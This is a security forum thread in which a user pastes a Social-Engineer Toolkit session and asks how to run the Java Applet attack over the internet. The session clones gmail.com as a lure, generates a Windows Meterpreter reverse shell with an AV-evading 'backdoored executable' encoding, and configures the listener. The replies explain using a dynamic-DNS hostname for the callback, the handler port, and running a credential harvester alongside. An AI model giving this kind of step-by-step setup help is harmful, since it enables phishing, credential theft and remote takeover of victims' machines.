
[query] Java Applet Set- Over The Internet


Shinigami


Hi, before I pose my query, I would like to introduce myself. I've been a CEH and ECSA for quite some time now. However, I'm still learning, and today I was just curious about understanding the routing, i.e. how SET is connected to the MSF.

Question: To make things simple I'm copying the lines from the Terminal and I'll point out what I'm referring to. Setting up JavaApplet in S.E.T:


   1) Java Applet Attack Method

set:webattack>1

   2) Site Cloner

set:webattack>2

[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.

set> Are you using NAT/Port Forwarding [yes|no]: y  

#####set:webattack> IP address to SET web server (this could be your external IP or hostname):***.***.***.***######

#####set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:n#######

[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com

set:webattack> Enter the url to clone:https://gmail.com

[*] Cloning the website: https://gmail.com
 [*] Malicious java applet website prepped for deployment

What payload do you want to generate:

  Name:                                       Description:
   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
set:payloads>2

Below is a list of encodings to try and bypass AV. 
Select one of the below, 'backdoored executable' is typically the best.

   1) avoid_utf8_tolower (Normal)
  16) Backdoored Executable (BEST)

set:encoding>16
#####set:payloads> PORT of the listener [443]:#####

[*] Generating x64-based powershell injection code...

FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP Address here? For I have a Dynamic IP issue here. Since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS.

SECOND: The Second line of code following, I seriously don't understand this. If I put in a Local Static IP address in this field (after choosing 'yes'), would that make a difference? What would be the 'Correct' option if I were to practice this over the Internet? Would I use the PUBLIC-IP/DNS just like I used it for the option Before this one? & why would it ask for my HANDLER's IP when it generates its own Handler? Please elaborate this option thank you.

THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port?

LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester alongside it when they both are on different ports?

Thank you


FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP Address here? For I have a Dynamic IP issue here. Since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS.

If your external IP address is dynamic, then I'd use the No-IP "hostname"; if it's static I'd just use the IP.

THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port?

Correct, when the target machine connects back to your attacker's machine, it will be looking for a port to connect to. The default port is 443 but it can be changed to any port you want.

LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester alongside it when they both are on different ports?

It won't be possible to run both applications on the same ports; what you could do is have both apps running at the same time but on different ports.


If your external IP address is dynamic, then I'd use the No-IP "hostname"; if it's static I'd just use the IP.

Correct, when the target machine connects back to your attacker's machine, it will be looking for a port to connect to. The default port is 443 but it can be changed to any port you want.

It won't be possible to run both applications on the same ports; what you could do is have both apps running at the same time but on different ports.

Thank you! Very grateful for your response, very elaborate. Can you please explain the SECOND query I posted? It concerns the line where it asks if my Metasploit is running on the same IP or a different one. Should I use my Local IP here or the Public one again?

Thanks again.
